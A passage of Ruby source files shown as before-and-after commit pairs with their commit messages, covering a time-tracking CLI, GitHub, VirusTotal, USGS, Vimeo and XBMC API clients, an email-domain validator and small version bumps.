self.args = Getopt::Declare.new(USAGE.dup, Timetrap::Config['default_command'])
end
command = args.unused.shift
set_global_options
case (valid = commands.select{|name| name =~ %r|^#{command}|}).size
when 1 then send valid[0]
else
handle_invalid_command(command)
end
end
def valid_command(command)
return commands.include?(command)
end
def handle_invalid_command(command)
if !command
puts USAGE
elsif mapping = deprecated_commands.detect{|(k,v)| k =~ %r|^#{command}|}
deprecated, current = *mapping
warn "The #{deprecated.inspect} command is deprecated in favor of #{current.inspect}. Sorry for the inconvenience."
send current
else
warn "Invalid command: #{command.inspect}"
end
end
# currently just sets whether output should be rounded to 15 min intervals
def set_global_options
Timetrap::Entry.round = true if args['-r']
end
def archive
ee = selected_entries
if ask_user "Archive #{ee.count} entries? "
ee.all.each do |e|
next unless e.end
e.update :sheet => "_#{e.sheet}"
end
else
warn "archive aborted!"
end
end
def configure
Config.configure!
puts "Config file is at #{Config::PATH.inspect}"
end
def edit
entry = case
when args['-i']
warn "Editing entry with id #{args['-i'].inspect}"
Entry[args['-i']]
when Timer.active_entry
warn "Editing running entry"
Timer.active_entry
when Timer.last_checkout
warn "Editing last entry you checked out of"
Timer.last_checkout
end
unless entry
warn "Can't find entry"
return
end
warn ""
entry.update :start => args['-s'] if args['-s'] =~ /.+/
entry.update :end => args['-e'] if args['-e'] =~ /.+/
# update sheet
if args['-m'] =~ /.+/
if entry == Timer.active_entry
Timer.current_sheet = args['-m']
end
entry.update :sheet => args['-m']
end
# update notes
if unused_args =~ /.+/
note = unused_args
if args['-z']
note = [entry.note, note].join(Config['append_notes_delimiter'])
end
entry.update :note => note
end
puts format_entries(entry)
end
def backend
exec "sqlite3 #{DB_NAME}"
end
def in
if Config['auto_checkout']
Timer.stop_all(args['-a']).each do |checked_out_of|
warn "Checked out of sheet #{checked_out_of.sheet.inspect}."
end
end
if Config['require_note'] && !Timer.running? && unused_args.empty?
$stderr.print("Please enter a note for this entry:\n> ")
self.unused_args = $stdin.gets
end
Timer.start unused_args, args['-a']
warn "Checked into sheet #{Timer.current_sheet.inspect}."
end
def resume
last_entry = Timer.entries(Timer.current_sheet).last
last_entry ||= Timer.entries("_#{Timer.current_sheet}").last
warn "No entry yet on this sheet yet. Started a new entry." unless last_entry
note = (last_entry ? last_entry.note : nil)
warn "Resuming #{note.inspect} from entry ##{last_entry.id}" if note
self.unused_args = note || unused_args
self.in
end
def out
if Config['auto_checkout']
stopped = Timer.stop_all(args['-a']).each do |checked_out_of|
warn "Checked out of sheet #{checked_out_of.sheet.inspect}."
end
if stopped.empty?
warn "No running entries to stop."
end
else
sheet = sheet_name_from_string(unused_args)
if Timer.stop sheet, args['-a']
warn "Checked out of sheet #{sheet.inspect}."
else
warn "No running entry on sheet #{sheet.inspect}."
end
end
end
def kill
if e = Entry[args['-i']]
out = "are you sure you want to delete entry #{e.id}? "
out << "(#{e.note}) " if e.note.to_s =~ /.+/
if ask_user out
e.destroy
warn "it's dead"
else
warn "will not kill"
end
elsif (sheets = Entry.map{|e| e.sheet }.uniq).include?(sheet = unused_args)
victims = Entry.filter(:sheet => sheet).count
if ask_user "are you sure you want to delete #{victims} entries on sheet #{sheet.inspect}? "
Entry.filter(:sheet => sheet).destroy
warn "killed #{victims} entries"
else
warn "will not kill"
end
else
victim = args['-i'] ? args['-i'].to_s.inspect : sheet.inspect
warn ["can't find #{victim} to kill", 'sheets:', *sheets].join("\n")
end
end
def display
entries = selected_entries.order(:start).all
if entries == []
warn "No entries were selected to display."
else
puts format_entries(entries)
end
end
def sheet
sheet = unused_args
case sheet
when nil, ''
list
return
when '-'
if Timer.last_sheet
sheet = Timer.last_sheet
else
warn 'LAST_SHEET is not set'
return
end
end
Timer.current_sheet = sheet
warn "Switching to sheet #{sheet.inspect}"
end
def list
sheets = ([Timer.current_sheet] | Entry.sheets).map do |sheet|
sheet_atts = {:total => 0, :running => 0, :today => 0}
entries = Timetrap::Entry.filter(:sheet => sheet)
if entries.empty?
sheet_atts.merge(:name => sheet)
else
entries.inject(sheet_atts) do |m, e|
e_end = e.end_or_now
m[:name] ||= sheet
m[:total] += (e_end.to_i - e.start.to_i)
m[:running] += (e_end.to_i - e.start.to_i) unless e.end
m[:today] += (e_end.to_i - e.start.to_i) if same_day?(Time.now, e.start)
m
end
end
end.sort_by{|sheet| sheet[:name].downcase}
width = sheets.sort_by{|h|h[:name].length }.last[:name].length + 4
width = 10 if width < 10
puts " %-#{width}s%-12s%-12s%s" % ["Timesheet", "Running", "Today", "Total Time"]
sheets.each do |sheet|
star = sheet[:name] == Timer.current_sheet ? '*' : sheet[:name] == Timer.last_sheet ? '-' : ' '
puts "#{star}%-#{width}s%-12s%-12s%s" % [
sheet[:running],
sheet[:today],
sheet[:total]
].map(&method(:format_seconds)).unshift(sheet[:name])
end
end
def now
if !Timer.running?
warn "*#{Timer.current_sheet}: not running"
end
Timer.running_entries.each do |entry|
current = entry.sheet == Timer.current_sheet
out = current ? '*' : ' '
out << "#{entry.sheet}: #{format_duration(entry.duration)}".gsub(/ /, ' ')
out << " (#{entry.note})" if entry.note =~ /.+/
puts out
end
end
def today
args['-s'] = Date.today.to_s
display
end
def yesterday
yesterday = (Date.today - 1).to_s
args['-s'] = yesterday
args['-e'] = yesterday
display
end
def week
args['-s'] = Date.today.wday == 1 ? Date.today.to_s : Date.parse(Chronic.parse(%q(last monday)).to_s).to_s
display
end
def month
d = Chronic.parse( args['-s'] || Date.today )
beginning_of_month = Date.new( d.year, d.month )
end_of_month = if d.month == 12 # handle edgecase
Date.new( d.year + 1, 1) - 1
else
Date.new( d.year, d.month+1 ) - 1
end
args['-s'] = beginning_of_month.to_s
args['-e'] = end_of_month.to_s
display
end
private
def unused_args
args.unused.join(' ')
end
def unused_args=(str)
args.unused = str.split
end
def ask_user question
return true if args['-y']
$stderr.print question
$stdin.gets =~ /\Aye?s?\Z/i
end
def format_entries(entries)
load_formatter(args['-f'] || Config['default_formatter']).new(Array(entries)).output
end
end
end
|
require 'faraday'
module Trellish
module Git
def current_git_branch
@current_git_branch ||= `cat .git/head`.split('/').last.strip
end
def github_pull_request_url
return @github_pull_request_url if @github_pull_request_url
conn = Faraday.new(:url => 'https://api.github.com', :ssl => {:ca_file => '/System/Library/OpenSSL/certs/ca-certificates.crt'}) do |faraday|
faraday.request :url_encoded
faraday.adapter ::Faraday.default_adapter
end
begin
response = conn.post do |req|
req.url "/repos/#{git_repository_owner}/#{git_repository_name}/pulls"
req.headers['Content-Type'] = 'application/json'
req.headers['Authorization'] = "token #{Trellish.config[:github_oauth_token]}"
req.body = {
title: @card.name,
base: Trellish.config[:git_base_branch],
head: "#{git_repository_owner}:#{current_git_branch}"
}.to_json
end
rescue Faraday::Error::ConnectionFailed => e
Trellish.logger.error "Failed to connect to Github. Please check your github_oauth_token parameter in trellish.yml, or regenerate it if you continue to have problems. Original error: #{e.message}"
exit
end
@github_pull_request_url = JSON.parse(response.body)["html_url"]
end
def git_repository_name
@git_repository_name ||= matches[2]
end
def git_repository_owner
@git_repository_owner ||= matches[1]
end
def matches
@matches ||= matches = remote_url.match(%r|^git@github.com:([^/]*)\/([^\.]*)\.git$|)
end
def remote_url
@remote_url ||= `git config remote.origin.url`
end
end
end
More helpful github api error messages
require 'faraday'
module Trellish
module Git
def current_git_branch
@current_git_branch ||= `cat .git/head`.split('/').last.strip
end
def github_pull_request_url
return @github_pull_request_url if @github_pull_request_url
conn = Faraday.new(:url => 'https://api.github.com', :ssl => {:ca_file => '/System/Library/OpenSSL/certs/ca-certificates.crt'}) do |faraday|
faraday.request :url_encoded
faraday.adapter ::Faraday.default_adapter
end
begin
response = conn.post do |req|
req.url "/repos/#{git_repository_owner}/#{git_repository_name}/pulls"
req.headers['Content-Type'] = 'application/json'
req.headers['Authorization'] = "token #{Trellish.config[:github_oauth_token]}"
req.body = {
title: @card.name,
base: Trellish.config[:git_base_branch],
head: "#{git_repository_owner}:#{current_git_branch}"
}.to_json
end
rescue Faraday::Error::ConnectionFailed => e
Trellish.logger.error "Failed to connect to Github. Please check your github_oauth_token parameter in trellish.yml, or regenerate it if you continue to have problems. Original error: #{e.message}"
exit
end
if response.status == 401
Trellish.logger.error "The response from the Github API says Bad Credentials. Please check your github_oauth_token parameter in trellish."
exit
end
@github_pull_request_url = JSON.parse(response.body)["html_url"]
end
def git_repository_name
@git_repository_name ||= matches[2]
end
def git_repository_owner
@git_repository_owner ||= matches[1]
end
def matches
@matches ||= matches = remote_url.match(%r|^git@github.com:([^/]*)\/([^\.]*)\.git$|)
end
def remote_url
@remote_url ||= `git config remote.origin.url`
end
end
end
|
# Copyright (c) 2012-2013 Arxopia LLC.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# Neither the name of the project's author nor the names of its contributors
# may be used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
module Uirusu
#
#
module VTUrl
SCAN_URL = "https://www.virustotal.com/vtapi/v2/url/scan"
REPORT_URL = "http://www.virustotal.com/vtapi/v2/url/report"
# Submits a URL to be scanned by Virustotal.com
#
# @param api_key Virustotal.com API key
# @param resource url to submit
#
# @return [JSON] Parsed response
def self.scan_url(api_key, resource)
if api_key == nil
raise "Invalid API Key"
end
if resource == nil
raise "Invalid resource, must be a valid url"
end
response = RestClient.post SCAN_URL, :apikey => api_key, :url => resource
case response.code
when 429
raise "Virustotal limit reached. Try again later."
when 403
raise "Invalid privileges, please check your API key."
when 200
JSON.parse(response)
else
raise "Unknown Server error."
end
end
# Searches reports by URL from Virustotal.com
#
# @param api_key Virustotal.com API key
# @param resource url to search
#
# @return [JSON] Parsed response
def self.query_report(api_key, resource)
if api_key == nil
raise "Invalid API Key"
end
if resource == nil
raise "Invalid resource, must be a valid url"
end
response = RestClient.post REPORT_URL, :apikey => api_key, :resource => resource
case response.code
when 429
raise "Virustotal limit reached. Try again later."
when 403
raise "Invalid privileges, please check your API key."
when 200
JSON.parse(response)
else
raise "Unknown Server error."
end
end
end
end
Modified API URI constants to use Uirusu::VT_API
# Copyright (c) 2012-2013 Arxopia LLC.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# Neither the name of the project's author nor the names of its contributors
# may be used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
module Uirusu
#
#
module VTUrl
SCAN_URL = Uirusu::VT_API + "/url/scan"
REPORT_URL = Uirusu::VT_API + "/url/report"
# Submits a URL to be scanned by Virustotal.com
#
# @param api_key Virustotal.com API key
# @param resource url to submit
#
# @return [JSON] Parsed response
def self.scan_url(api_key, resource)
if api_key == nil
raise "Invalid API Key"
end
if resource == nil
raise "Invalid resource, must be a valid url"
end
response = RestClient.post SCAN_URL, :apikey => api_key, :url => resource
case response.code
when 429
raise "Virustotal limit reached. Try again later."
when 403
raise "Invalid privileges, please check your API key."
when 200
JSON.parse(response)
else
raise "Unknown Server error."
end
end
# Searches reports by URL from Virustotal.com
#
# @param api_key Virustotal.com API key
# @param resource url to search
#
# @return [JSON] Parsed response
def self.query_report(api_key, resource)
if api_key == nil
raise "Invalid API Key"
end
if resource == nil
raise "Invalid resource, must be a valid url"
end
response = RestClient.post REPORT_URL, :apikey => api_key, :resource => resource
case response.code
when 429
raise "Virustotal limit reached. Try again later."
when 403
raise "Invalid privileges, please check your API key."
when 200
JSON.parse(response)
else
raise "Unknown Server error."
end
end
end
end
|
module Usgs
class Request
def self.measurements_by(input, date_range = nil)
response = make_api_request(input, date_range)
return response if response[:status] == "Invalid Request"
time_series = response["value"]["timeSeries"]
# create a hash using gauge_id as the key
# this accounts for the USGS api response where multiple timeSeries
# objects exist for the same gauge_id
streams = Hash.new
time_series.each do |ts|
site_id = ts["sourceInfo"]["siteCode"].first["value"]
state_property = ts["sourceInfo"]["siteProperty"].find { |p| p["name"] == "stateCd" }
state = state_lookup[state_property["value"]]
values = ts["values"].first["value"]
unit = ts["variable"]["unit"]["unitAbbreviation"]
measurements = []
unless streams.key?(site_id)
streams[site_id] = {}
streams[site_id][:sitename] = ts["sourceInfo"]["siteName"]
streams[site_id][:state] = state
streams[site_id][:geolocation] = ts["sourceInfo"]["geoLocation"]["geogLocation"]
streams[site_id][:measurements] = measurements
end
values.each do |value|
streams[site_id][:measurements] << {
"dateTime" => value["dateTime"],
"unit" => unit,
"value" => value["value"]
}
end
end
# convert the hash to individual gauge objects
streams.map do |gauge_id, data|
Usgs::Gauge.new(
gauge_id: gauge_id,
site_name: data[:sitename],
state: data[:state],
geo_location: data[:geolocation],
measurements: data[:measurements]
)
end
end
private
# https://waterservices.usgs.gov/nwis/iv/?format=json&indent=on&sites=06614800&siteType=ST&siteStatus=active¶meterCd=00060
def self.make_api_request(input, date_range=nil)
base_url = "https://waterservices.usgs.gov/nwis/iv/?format=json"
if input.length == 2 && date_range
request_params = "&stateCd=#{input}&startDT=#{date_range.first.to_s}&endDT=#{date_range.last.to_s}"
elsif input.length == 2
request_params = "&stateCd=#{input}"
elsif input.length >= 8 && date_range
request_params = "&sites=#{input}&startDT=#{date_range.first.to_s}&endDT=#{date_range.last.to_s}"
elsif input.length >= 8
request_params = "&sites=#{input}"
else
return {:status => "Invalid Request"}
end
response = Faraday.get(base_url + request_params)
JSON.parse(response.body)
end
def self.state_lookup
{
"01"=>"AL","02"=>"AK","04"=>"AZ","05"=>"AR","06"=>"CA","08"=>"CO",
"09"=>"CT","10"=>"DE","11"=>"DC","12"=>"FL","13"=>"GA","15"=>"HI",
"16"=>"ID","17"=>"IL","18"=>"IN","19"=>"IA","20"=>"KS","21"=>"KY",
"22"=>"LA","23"=>"ME","24"=>"MD","25"=>"MA","26"=>"MI","27"=>"MN",
"28"=>"MS","29"=>"MO","30"=>"MT","31"=>"NE","32"=>"NV","33"=>"NH",
"34"=>"NJ","35"=>"NM","36"=>"NY","37"=>"NC","38"=>"ND","39"=>"OH",
"40"=>"OK","41"=>"OR","42"=>"PA","44"=>"RI","45"=>"SC","46"=>"SD",
"47"=>"TN","48"=>"TX","49"=>"UT","50"=>"VT","51"=>"VA","53"=>"WA",
"54"=>"WV","55"=>"WI","56"=>"WY"
}
end
end
end
Fixs unit
module Usgs
class Request
def self.measurements_by(input, date_range = nil)
response = make_api_request(input, date_range)
return response if response[:status] == "Invalid Request"
time_series = response["value"]["timeSeries"]
# create a hash using gauge_id as the key
# this accounts for the USGS api response where multiple timeSeries
# objects exist for the same gauge_id
streams = Hash.new
time_series.each do |ts|
site_id = ts["sourceInfo"]["siteCode"].first["value"]
state_property = ts["sourceInfo"]["siteProperty"].find { |p| p["name"] == "stateCd" }
state = state_lookup[state_property["value"]]
values = ts["values"].first["value"]
unit = ts["variable"]["unit"]["unitAbbreviation"]
measurements = []
unless streams.key?(site_id)
streams[site_id] = {}
streams[site_id][:sitename] = ts["sourceInfo"]["siteName"]
streams[site_id][:state] = state
streams[site_id][:geolocation] = ts["sourceInfo"]["geoLocation"]["geogLocation"]
streams[site_id][:measurements] = measurements
end
values.each do |value|
streams[site_id][:measurements] << {
"dateTime" => value["dateTime"],
"unit" => unit,
"value" => value["value"]
}
end
end
# convert the hash to individual gauge objects
streams.map do |gauge_id, data|
Usgs::Gauge.new(
gauge_id: gauge_id,
site_name: data[:sitename],
state: data[:state],
geo_location: data[:geolocation],
measurements: data[:measurements]
)
end
end
private
# https://waterservices.usgs.gov/nwis/iv/?format=json&indent=on&sites=06614800&siteType=ST&siteStatus=active¶meterCd=00060
def self.make_api_request(input, date_range=nil)
base_url = "https://waterservices.usgs.gov/nwis/iv/?format=json"
if input.length == 2 && date_range
request_params = "&stateCd=#{input}&startDT=#{date_range.first.to_s}&endDT=#{date_range.last.to_s}"
elsif input.length == 2
request_params = "&stateCd=#{input}"
elsif input.length >= 8 && date_range
request_params = "&sites=#{input}&startDT=#{date_range.first.to_s}&endDT=#{date_range.last.to_s}"
elsif input.length >= 8
request_params = "&sites=#{input}"
else
return {:status => "Invalid Request"}
end
response = Faraday.get(base_url + request_params)
JSON.parse(response.body)
end
def self.state_lookup
{
"01"=>"AL","02"=>"AK","04"=>"AZ","05"=>"AR","06"=>"CA","08"=>"CO",
"09"=>"CT","10"=>"DE","11"=>"DC","12"=>"FL","13"=>"GA","15"=>"HI",
"16"=>"ID","17"=>"IL","18"=>"IN","19"=>"IA","20"=>"KS","21"=>"KY",
"22"=>"LA","23"=>"ME","24"=>"MD","25"=>"MA","26"=>"MI","27"=>"MN",
"28"=>"MS","29"=>"MO","30"=>"MT","31"=>"NE","32"=>"NV","33"=>"NH",
"34"=>"NJ","35"=>"NM","36"=>"NY","37"=>"NC","38"=>"ND","39"=>"OH",
"40"=>"OK","41"=>"OR","42"=>"PA","44"=>"RI","45"=>"SC","46"=>"SD",
"47"=>"TN","48"=>"TX","49"=>"UT","50"=>"VT","51"=>"VA","53"=>"WA",
"54"=>"WV","55"=>"WI","56"=>"WY"
}
end
end
end
|
require "valid_email2/email_validator"
module ValidEmail2
DISPOSABLE_DOMAINS_FILE = File.expand_path("../../vendor/disposable_domains.txt", __FILE__)
BLACKLISTED_DOMAINS_FILE = File.expand_path("../../vendor/blacklisted_domains.txt", __FILE__)
def self.domain_is_disposable?(domain)
domain_in_file?(domain, DISPOSABLE_DOMAINS_FILE)
end
def self.domain_is_blacklisted?(domain)
domain_in_file?(domain, BLACKLISTED_DOMAINS_FILE)
end
protected
def self.domain_in_file?(domain, filename)
return false unless File.exists?(filename)
domain_matched = false
File.open(filename).each do |line|
if domain.include?(line.chomp)
domain_matched = true
break
end
end
domain_matched
end
end
Use String#end_with? instead of String#include? when checking a domain for a disallowed domain
require "valid_email2/email_validator"
module ValidEmail2
DISPOSABLE_DOMAINS_FILE = File.expand_path("../../vendor/disposable_domains.txt", __FILE__)
BLACKLISTED_DOMAINS_FILE = File.expand_path("../../vendor/blacklisted_domains.txt", __FILE__)
def self.domain_is_disposable?(domain)
domain_in_file?(domain, DISPOSABLE_DOMAINS_FILE)
end
def self.domain_is_blacklisted?(domain)
domain_in_file?(domain, BLACKLISTED_DOMAINS_FILE)
end
protected
def self.domain_in_file?(domain, filename)
return false unless File.exists?(filename)
domain_matched = false
File.open(filename).each do |line|
if domain.end_with?(line.chomp)
domain_matched = true
break
end
end
domain_matched
end
end
|
module Verilog
class File #< Class::File
attr_reader :filename, :options
attr_accessor :contents
def initialize( filename, options={} )
@filename = filename
@options = options
@options[:path] ||= ''
end
#Alias method
def read_from_disk
read()
end
def read
if ::File.exist?( absolute_filename )
::File.open( absolute_filename, "rb") do |f|
@contents = f.read
end
else
#TODO raise correct exception here
puts "ERROR File Not Found #{absolute_filename}"
end
end
def save
::File.open( absolute_filename, "w" ) do |f|
f.write @contents
end
end
def absolute_filename
::File.join( @options[:path], @filename )
end
end
end
Updated Verilog::File with includes and instantiations
module Verilog
class File #< Class::File
attr_reader :filename, :options
attr_accessor :contents
def initialize( filename, options={} )
@filename = filename
@options = options
@options[:path] ||= ''
end
#Alias method
def read_from_disk
read()
end
def read
if ::File.exist?( absolute_filename )
::File.open( absolute_filename, "rb") do |f|
@contents = f.read
end
else
#TODO raise correct exception here
puts "ERROR File Not Found #{absolute_filename}"
end
end
def save
::File.open( absolute_filename, "w" ) do |f|
f.write @contents
end
end
def absolute_filename
::File.join( @options[:path], @filename )
end
def module_name
if @contents.match(/(^\s*module *)(.*)(;|\s*\()/i)
return $2
else
return ""
end
end
def instantiations
inst = []
@contents.scan(/(^\s*)(\w*)\s+\w+\s*(\([.,\(\)\w\s]*\))?;/mi){ inst << $2 }
#Hack, module will also match the instatiation syntax, rempve via array subtraction
inst = inst - ['module']
return inst
end
def includes
inc = []
@contents.scan(/(^\s*`include [\'\"])(.*)([\'\"])/i){ inc << $2 }
return inc
end
end #class File
end #modlue Verilog
|
module Vesr
VERSION = "0.12.4"
end
Bump to 0.12.5
module Vesr
VERSION = "0.12.5"
end
|
require 'typhoeus'
require 'oj'
require 'simple_oauth'
require 'pry' # TODO: remove me once done
require 'vimeo_videos/version'
require 'vimeo_videos/exceptions'
require 'vimeo_videos/client'
require 'vimeo_videos/base_request'
require 'vimeo_videos/request'
require 'vimeo_videos/upload_request'
require 'vimeo_videos/upload'
# Upload videos to Vimeo through V2 API.
module VimeoVideos
end
Don't load pry
require 'typhoeus'
require 'oj'
require 'simple_oauth'
# require 'pry' # TODO: remove me once done
require 'vimeo_videos/version'
require 'vimeo_videos/exceptions'
require 'vimeo_videos/client'
require 'vimeo_videos/base_request'
require 'vimeo_videos/request'
require 'vimeo_videos/upload_request'
require 'vimeo_videos/upload'
# Upload videos to Vimeo through V2 API.
module VimeoVideos
end
|
module VIPS
VERSION = "0.1.0"
end
0.1.1
module VIPS
VERSION = "0.1.1"
end
|
# This program allows easy interaction with XBMC's json-rpc API.
# Connection information is provided, and connection is created
# and stored for repeated use. The list of classes and methods
# available are retrieved from the XBMC json-rpc API, and can be
# accessed or referenced using instance.commands or
# instance.print_commands. An command can be searched for using
# instance.apropos
#
# Author:: atom smith (http://twitter.com/re5et)
# Copyright:: Copyright (c) 2010 atom smith
# License:: Distributes under the same terms as Ruby
require 'rubygems'
require 'net/http'
require 'json'
# The XBMC_JSONRPC module is a namespace / wrapper
module XBMC_JSONRPC
# Attempt to create connection with xbmc server, and retrieve available
# commands. Accepts connection information arguments and if successful
# returns a new connection
def self.new(options = {})
@connection = XBMC_JSONRPC::Connection.new(options)
if @connection.command('JSONRPC.Ping')
commands = @connection.command('JSONRPC.Introspect')['result']['commands']
@commands = {}
commands.each do |command|
command_name = command.shift[1]
@commands[command_name] = command
end
return self
end
return false
end
# Make an API call to the instance XBMC server
def self.command(method,args = {})
@connection.command(method, args)
end
# returns all available commands returned by JSON.Introspect
def self.commands
@commands
end
# nicely print out all available commands.
# useful at command line / irb / etc
def self.get_commands
@commands.each {|k,v| self.pp_command k }
return nil
end
# finds and prettily prints appropriate commands based on provided keyword
def self.apropos(find)
regexp = /#{find}/im
matches = []
@commands.each do |k,v|
matches.push(k) if k =~ regexp || v['description'] =~ regexp
end
if matches.empty?
puts "\n\nNo commands found, try being less specific\n\n"
else
matches.each {|command| self.pp_command command }
end
return nil
end
# prettily print out requested command
def self.pp_command(command)
description = @commands[command]['description']
description = "<no description exists for #{command}>" unless !description.empty?
puts "\n\t#{command}"
puts "\t\t#{description}\n\n"
end
# Class to create and store connection information for xbmc server
# also handles actual json back and forth.
class Connection
def initialize(options)
connection_info = {
:server => '127.0.0.1',
:port => '8080',
:user => 'xbmc',
:pass => ''
}
@connection_info = connection_info.merge(options)
@url = URI.parse("http://#{@connection_info[:server]}:#{@connection_info[:port]}/jsonrpc")
end
def command(method, params = {})
req = Net::HTTP::Post.new(@url.path)
req.basic_auth @connection_info[:user], @connection_info[:pass]
req.add_field 'Content-Type', 'application/json'
req.body = {
"id" => 1,
"jsonrpc" => "2.0",
"method" => method,
"params" => params
}.to_json
res = Net::HTTP.new(@url.host, @url.port).start {|http| http.request(req) }
if res.kind_of? Net::HTTPSuccess
return JSON.parse(res.body)
else
return res.error!
end
rescue StandardError
print "Unable to connect to server specified\n", $!
return false
end
end
# utility class for others to inherit from. For now uses method missing
# to make all calls to the send_command because there is no meaningful
# difference between namespaces / methods at the moment.
class APIBase
# get the correct api namespace to use
def self.namespace
@namespace = @namespace || self.name.to_s.split('::')[1]
end
# pass on namespace + method and arguments
def self.method_missing(method, args = {})
XBMC_JSONRPC.command("#{self.namespace}.#{method}", args)
end
# show commands for namespace
def self.commands
XBMC_JSONRPC.commands.keys.grep(/#{self.namespace}\./) {|command| XBMC_JSONRPC.pp_command(command) }
end
end
class JSONRPC < APIBase
# def self.Introspect
# end
# def self.Version
# end
# def self.Permission
# end
# def self.Ping
# end
# def self.Announce
# end
end
class Player < APIBase
# def self.GetActivePlayers
# end
end
class AudioPlayer < APIBase
# same methods as VideoPlayer
end
class VideoPlayer < APIBase
# def self.PlayPause
# end
# def self.Stop
# end
# def self.SkipPrevious
# end
# def self.SkipNext
# end
# def self.BigSkipBackward
# end
# def self.BigSkipForward
# end
# def self.SmallSkipBackward
# end
# def self.SmallSkipForward
# end
# def self.Rewind
# end
# def self.Forward
# end
# def self.GetTime
# end
# def self.GetTimeMS
# end
# def self.GetPercentage
# end
# def self.SeekTime
# end
# def self.SeekPercentage
# end
end
class PicturePlayer < APIBase
# def self.PlayPause
# end
# def self.Stop
# end
# def self.SkipPrevious
# end
# def self.SkipNext
# end
# def self.MoveLeft
# end
# def self.MoveRight
# end
# def self.MoveDown
# end
# def self.MoveUp
# end
# def self.ZoomOut
# end
# def self.ZoomIn
# end
# def self.Zoom
# end
# def self.Rotate
# end
end
class VideoPlaylist < APIBase
# def self.Play
# end
# def self.SkipPrevious
# end
# def self.SkipNext
# end
# def self.GetItems
# end
# def self.Add
# end
# def self.Clear
# end
# def self.Shuffle
# end
# def self.UnShuffle
# end
end
class AudioPlaylist < APIBase
# def self.Play
# end
# def self.SkipPrevious
# end
# def self.SkipNext
# end
# def self.GetItems
# end
# def self.Add
# end
# def self.Clear
# end
# def self.Shuffle
# end
# def self.UnShuffle
# end
end
class Playlist < APIBase
# def self.Create
# end
# def self.Destroy
# end
# def self.GetItems
# end
# def self.Add
# end
# def self.Remove
# end
# def self.Swap
# end
# def self.Shuffle
# end
end
class Files < APIBase
# def self.GetSources
# end
# def self.Download
# end
# def self.GetDirectory
# end
end
class AudioLibrary < APIBase
# def self.GetArtists
# end
# def self.GetAlbums
# end
# def self.GetSongs
# end
# def self.ScanForContent
# end
end
class VideoLibrary < APIBase
# def self.GetMovies
# end
# def self.GetTVShows
# end
# def self.GetSeasons
# end
# def self.GetEpisodes
# end
# def self.GetMusicVideoAlbums
# end
# def self.GetMusicVideos
# end
# def self.GetRecentlyAddedMovies
# end
# def self.GetRecentlyAddedEpisodes
# end
# def self.GetRecentlyAddedMusicVideos
# end
# def self.ScanForContent
# end
end
class System < APIBase
# def self.Shutdown
# end
# def self.Suspend
# end
# def self.Hibernate
# end
# def self.Reboot
# end
# def self.GetInfoLabels
# end
# def self.GetInfoBooleans
# end
end
class XBMC < APIBase
# def self.GetVolume
# end
# def self.SetVolume
# end
# def self.ToggleMute
# end
# def self.Play
# end
# def self.StartSlideShow
# end
# def self.Log
# end
# def self.Quit
# end
end
end
Allow setting an `id` per request
# This program allows easy interaction with XBMC's json-rpc API.
# Connection information is provided, and connection is created
# and stored for repeated use. The list of classes and methods
# available are retrieved from the XBMC json-rpc API, and can be
# accessed or referenced using instance.commands or
# instance.print_commands. An command can be searched for using
# instance.apropos
#
# Author:: atom smith (http://twitter.com/re5et)
# Copyright:: Copyright (c) 2010 atom smith
# License:: Distributes under the same terms as Ruby
require 'rubygems'
require 'net/http'
require 'json'
# The XBMC_JSONRPC module is a namespace / wrapper
module XBMC_JSONRPC
# Attempt to create connection with xbmc server, and retrieve available
# commands. Accepts connection information arguments and if successful
# returns a new connection
def self.new(options = {})
@connection = XBMC_JSONRPC::Connection.new(options)
if @connection.command('JSONRPC.Ping')
commands = @connection.command('JSONRPC.Introspect')['result']['commands']
@commands = {}
commands.each do |command|
command_name = command.shift[1]
@commands[command_name] = command
end
return self
end
return false
end
# Make an API call to the instance XBMC server
def self.command(method,args = {})
